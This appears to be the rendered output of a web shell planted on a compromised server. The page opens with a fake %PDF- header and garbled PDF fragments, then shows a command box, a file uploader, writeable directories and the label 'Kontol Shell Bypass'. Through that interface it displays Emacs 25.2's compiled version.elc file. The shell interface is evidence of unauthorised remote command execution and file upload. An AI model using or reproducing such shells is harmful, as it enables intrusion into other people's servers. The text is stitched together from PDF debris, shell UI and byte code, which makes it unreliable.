%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /usr/share/emacs/25.2/lisp/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : //usr/share/emacs/25.2/lisp/version.elc
;ELC
;;; Compiled
;;; in Emacs version 25.2
;;; with all optimizations.

;;; This file uses dynamic docstrings, first added in Emacs 19.29.

;;; This file does not contain utf-8 non-ASCII characters,
;;; and so can be loaded in Emacs versions earlier than 23.

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;


#@94 Major version number of this version of Emacs.
This variable first existed in version 19.23.
(defconst emacs-major-version (byte-code "\301\302\"\210\303\304\305\"!\207" [emacs-version string-match "^[0-9]+" string-to-number match-string 0] 4) (#$ . 408))
#@94 Minor version number of this version of Emacs.
This variable first existed in version 19.23.
(defconst emacs-minor-version (byte-code "\301\302\"\210\303\304\305\"!\207" [emacs-version string-match "^[0-9]+\\.\\([0-9]+\\)" string-to-number match-string 1] 4) (#$ . 672))
#@37 Time at which Emacs was dumped out.
(defconst emacs-build-time (current-time) (#$ . 951))
#@46 Name of the system on which Emacs was built.
(defconst emacs-build-system (system-name) (#$ . 1047))
#@259 Return string describing the version of Emacs that is running.
If optional argument HERE is non-nil, insert string at point.
Don't use this function in programs to choose actions according
to the system configuration; look at `system-configuration' instead.
(defalias 'emacs-version #[(&optional here) "\306\307\310!\204\311\202\f\312	\313\314!\203\315\n\316\317OP\202A\313\320!\203)\321P\202A\313\322!\2033\323\202A\313\324!\203@\306\325\f\"\202A\326\313\327!\203N\306\330
\"\202O\326\331\332!\203h\333>\203h\306\334\335\336!!\"\202i\326\337\340#\"&$%\203}$c\202\215\307\310!\203\213\341\342$\"\202\215$)\207" [emacs-version system-configuration motif-version-string gtk-version-string ns-version-string cairo-version-string format called-interactively-p interactive "GNU Emacs %s (%s%s%s%s)\n of %s, modified by Debian" "GNU Emacs %s (%s%s%s%s) of %s, modified by Debian" featurep motif ", " 4 nil gtk ", GTK+ Version " x-toolkit ", X toolkit" ns ", NS %s" "" cairo ", cairo version %s" boundp x-toolkit-scroll-bars (xaw xaw3d) ", %s scroll bars" capitalize symbol-name format-time-string "%Y-%m-%d" message "%s" emacs-build-time version-string here] 11 (#$ . 1155) "P"])
(defalias 'version 'emacs-version)
#@179 String giving the repository revision from which this Emacs was built.
Value is nil if Emacs was not built from a repository checkout,
or if we could not determine the revision.
(defvar emacs-repository-version nil (#$ . 2405))
(byte-code "\302\303\304\305#\210\306\305\211\203,	@\303N\203%\304N\204%\307\304\303N#\210	A\211\204*\310\303\304\311#\210\312\313\314\305#\210\315\313\314\311#\207" [prop --dolist-tail-- defvaralias emacs-bzr-version emacs-repository-version nil (saved-value saved-variable-comment) put make-obsolete-variable "24.4" defalias emacs-bzr-get-version emacs-repository-get-version make-obsolete] 6)
#@63 Ask git itself for the version information for directory DIR.
(defalias 'emacs-repository-version-git #[(dir) "\304\305!\210\306\307!rq\210\310\216\311	!\3121#\313\314\315\316\315\317\320&0\202+\304\321\"\210)\315\322=\205<eb\210\323\324!\205<\325\322!,\207" [#1=#:temp-buffer dir default-directory #2=#:err message "Waiting for git..." generate-new-buffer " *temp*" #[nil "\301!\205	\302!\207" [#1# buffer-name kill-buffer] 2] file-name-as-directory (debug error) call-process "git" nil (t nil) "rev-parse" "HEAD" "Error running git rev-parse: %S" 0 looking-at "[0-9a-fA-F]\\{40\\}" match-string] 7 (#$ . 3048)])
#@56 Internal subroutine of `emacs-repository-get-version'.
(defalias 'emacs-repository--version-git-1 #[(file dir) "\303!\2050\304\305!r	q\210\306\216\307!\210\310\311!\203 \312\313!\202/\310\314!\205/\315\316\312\317!\n\"\n\"+\207" [file #1=#:temp-buffer dir file-readable-p generate-new-buffer " *temp*" #[nil "\301!\205	\302!\207" [#1# buffer-name kill-buffer] 2] insert-file-contents looking-at "[0-9a-fA-F]\\{40\\}" match-string 0 "ref: \\(.*\\)" emacs-repository--version-git-1 expand-file-name 1] 4 (#$ . 3681)])
#@628 Try to return as a string the repository revision of the Emacs sources.
The format of the returned string is dependent on the VCS in use.
Value is nil if the sources do not seem to be under version
control, or if we could not determine the revision.  Note that
this reports on the current state of the sources, which may not
correspond to the running Emacs.

Optional argument DIR is a directory to use instead of `source-directory'.
Optional argument EXTERNAL non-nil means to just ask the VCS itself,
if the sources appear to be under version control.  Otherwise only ask
the VCS if we cannot find any information ourselves.
(defalias 'emacs-repository-get-version #[(&optional dir external) "\204	\306\307\"\310\n!\311\211\204F\312\n!\203F\313\n!\203F\314\315!rq\210\316\216\317\n!\210\320\321!\203E\322\323!\211\322\324!P\325+\204N\f\205\236\203Y\326!\202\236\f\203g\327\306\330
\"\n\"\202\230\331\311\211\204\225@\211\203\225\306\n\"A\327\n\"\211\203u+\206\236\326!,\207" [dir source-directory base-dir in-main-worktree in-linked-worktree sub-dir expand-file-name ".git" file-directory-p nil file-regular-p file-readable-p generate-new-buffer " *temp*" #[nil "\301!\205	\302!\207" [#1=#:temp-buffer buffer-name kill-buffer] 2] insert-file-contents looking-at "gitdir: \\(.*.git\\)\\(.*\\)$" match-string 1 2 t emacs-repository-version-git emacs-repository--version-git-1 "HEAD" ("HEAD" "refs/heads/master") #1# external rev file files] 5 (#$ . 4214)])
(byte-code "\300\301\302\303\304\305 #\306Q!\207" [purecopy "\n$Id: " subst-char-in-string 10 32 emacs-version " $\n"] 6)

Kontol Shell Bypass